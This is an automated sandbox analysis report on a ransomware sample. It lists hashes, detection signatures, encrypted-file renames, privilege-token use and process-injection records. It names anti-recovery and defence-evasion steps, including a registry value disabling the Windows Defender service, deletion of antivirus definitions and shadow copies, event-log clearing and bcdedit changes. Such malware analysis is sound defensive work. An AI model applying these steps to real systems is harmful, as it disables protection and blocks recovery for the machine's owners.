Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
70s -
max time network
19s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:37
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2128 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2064 bcdedit.exe 2088 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exedescription ioc process File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SmnB7SJfbgM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SCVjS_SUHmc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QSIyA9OrOrc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\FlickLearningWizard.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0Scc7RX9iWo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_PHbZzK3FX480.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_zdyceR9rjt40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_0aX4uUpandY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TQsmL1HD9Rw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107426.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_TjmocohHRaY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\URBAN_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_jtVUgXbr3nk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\slideShow.html cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_T2f1YTnh7Vo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_V0iNF7Xuy4o0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fT96kQSn-vM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Media Player\en-US\mpvis.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR12F.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_A3euzVqq1Fg0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_rVj01KEl7Dc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183574.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_athj58JoGUE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FBXa0bENIu40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FCqVyLaojd80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18223_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_YHkKzVPIN1I0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_nu3S3dfdZB00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SMD432Qu-ak0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_CPLnX4BhkuQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_cemJP_srwg00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_tUax988JXcY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7S8RCYjYjiw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\ea.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_evcSqRAcDvI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ki1z2DLWmTA0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TextConv\Wks9Pxy.cnv.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Z9Xk-AfS86c0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EAST_01.MID.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_GppLoEuKDKs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_8B0I7jiiXj00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7KY_OPnWAaQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\ShvlRes.dll.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2HMAyB-0Lgk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_Fprr37D_N440.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_7LIJjfYbKaw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_KwBppXFmtS40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_DSb1W5lWS6w0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_60gHKunfb340.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_fUpF3aUXOFc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00019_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SpjqgTyHBZs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\VelvetRose.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_FdcJmx7Y2U40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_ekWVFheNPVQ0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_BbqsYLdFs180.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301418.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_VOy-VR2Iso40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_uOcZk-ANPcc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_---grD_fTEc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_3hpk6qUUMWY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_v8Nfnzrqe5E0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Riga.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_QZVDEoZAMEY0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01168_.WMF.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_SaZCMITig1I0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_2TjSCvsIuUw0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_1iJ3e5SRMqo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\es-ES\Hearts.exe.mui.ykfPdGgmyUsyZmly9Ty1gcxJl3TKKWtC8Z0RQyO0M-7_q4ULK1bt1o40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1708 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.execce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exepid process 2160 powershell.exe 2248 powershell.exe 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1592 wevtutil.exe Token: SeBackupPrivilege 1592 wevtutil.exe Token: SeSecurityPrivilege 1164 wevtutil.exe Token: SeBackupPrivilege 1164 wevtutil.exe Token: SeSecurityPrivilege 1700 wevtutil.exe Token: SeBackupPrivilege 1700 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1048 wmic.exe Token: SeSecurityPrivilege 1048 wmic.exe Token: SeTakeOwnershipPrivilege 1048 wmic.exe Token: SeLoadDriverPrivilege 1048 wmic.exe Token: SeSystemProfilePrivilege 1048 wmic.exe Token: SeSystemtimePrivilege 1048 wmic.exe Token: SeProfSingleProcessPrivilege 1048 wmic.exe Token: SeIncBasePriorityPrivilege 1048 wmic.exe Token: SeCreatePagefilePrivilege 1048 wmic.exe Token: SeBackupPrivilege 1048 wmic.exe Token: SeRestorePrivilege 1048 wmic.exe Token: SeShutdownPrivilege 1048 wmic.exe Token: SeDebugPrivilege 1048 wmic.exe Token: SeSystemEnvironmentPrivilege 1048 wmic.exe Token: SeRemoteShutdownPrivilege 1048 wmic.exe Token: SeUndockPrivilege 1048 wmic.exe Token: SeManageVolumePrivilege 1048 wmic.exe Token: 33 1048 wmic.exe Token: 34 1048 wmic.exe Token: 35 1048 wmic.exe Token: SeIncreaseQuotaPrivilege 892 wmic.exe Token: SeSecurityPrivilege 892 wmic.exe Token: SeTakeOwnershipPrivilege 892 wmic.exe Token: SeLoadDriverPrivilege 892 wmic.exe Token: SeSystemProfilePrivilege 892 wmic.exe Token: SeSystemtimePrivilege 892 wmic.exe Token: SeProfSingleProcessPrivilege 892 wmic.exe Token: SeIncBasePriorityPrivilege 892 wmic.exe Token: SeCreatePagefilePrivilege 892 wmic.exe Token: SeBackupPrivilege 892 wmic.exe Token: SeRestorePrivilege 892 wmic.exe Token: SeShutdownPrivilege 892 wmic.exe Token: SeDebugPrivilege 892 wmic.exe Token: SeSystemEnvironmentPrivilege 892 wmic.exe Token: SeRemoteShutdownPrivilege 892 wmic.exe Token: SeUndockPrivilege 892 wmic.exe Token: SeManageVolumePrivilege 892 wmic.exe Token: 33 892 wmic.exe Token: 34 892 wmic.exe Token: 35 892 wmic.exe Token: SeIncreaseQuotaPrivilege 892 wmic.exe Token: SeSecurityPrivilege 892 wmic.exe Token: SeTakeOwnershipPrivilege 892 wmic.exe Token: SeLoadDriverPrivilege 892 wmic.exe Token: SeSystemProfilePrivilege 892 wmic.exe Token: SeSystemtimePrivilege 892 wmic.exe Token: SeProfSingleProcessPrivilege 892 wmic.exe Token: SeIncBasePriorityPrivilege 892 wmic.exe Token: SeCreatePagefilePrivilege 892 wmic.exe Token: SeBackupPrivilege 892 wmic.exe Token: SeRestorePrivilege 892 wmic.exe Token: SeShutdownPrivilege 892 wmic.exe Token: SeDebugPrivilege 892 wmic.exe Token: SeSystemEnvironmentPrivilege 892 wmic.exe Token: SeRemoteShutdownPrivilege 892 wmic.exe Token: SeUndockPrivilege 892 wmic.exe Token: SeManageVolumePrivilege 892 wmic.exe Token: 33 892 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 612 wrote to memory of 1628 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1628 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1628 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1628 wrote to memory of 756 1628 net.exe net1.exe PID 1628 wrote to memory of 756 1628 net.exe net1.exe PID 1628 wrote to memory of 756 1628 net.exe net1.exe PID 612 wrote to memory of 432 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 432 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 432 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 432 wrote to memory of 572 432 net.exe net1.exe PID 432 wrote to memory of 572 432 net.exe net1.exe PID 432 wrote to memory of 572 432 net.exe net1.exe PID 612 wrote to memory of 304 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 304 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 304 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 304 wrote to memory of 1372 304 net.exe net1.exe PID 304 wrote to memory of 1372 304 net.exe net1.exe PID 304 wrote to memory of 1372 304 net.exe net1.exe PID 612 wrote to memory of 824 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 824 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 824 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 824 wrote to memory of 788 824 net.exe net1.exe PID 824 wrote to memory of 788 824 net.exe net1.exe PID 824 wrote to memory of 788 824 net.exe net1.exe PID 612 wrote to memory of 1180 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1180 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1180 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1180 wrote to memory of 1072 1180 net.exe net1.exe PID 1180 wrote to memory of 1072 1180 net.exe net1.exe PID 1180 wrote to memory of 1072 1180 net.exe net1.exe PID 612 wrote to memory of 624 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 624 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 624 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 624 wrote to memory of 2016 624 net.exe net1.exe PID 624 wrote to memory of 2016 624 net.exe net1.exe PID 624 wrote to memory of 2016 624 net.exe net1.exe PID 612 wrote to memory of 2020 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 2020 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 2020 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 2020 wrote to memory of 1332 2020 net.exe net1.exe PID 2020 wrote to memory of 1332 2020 net.exe net1.exe PID 2020 wrote to memory of 1332 2020 net.exe net1.exe PID 612 wrote to memory of 1512 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1512 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 612 wrote to memory of 1512 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe net.exe PID 1512 wrote to memory of 1716 1512 net.exe net1.exe PID 1512 wrote to memory of 1716 1512 net.exe net1.exe PID 1512 wrote to memory of 1716 1512 net.exe net1.exe PID 612 wrote to memory of 1692 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1692 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1692 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1624 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1624 612 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 612 wrote to memory of 1624 612 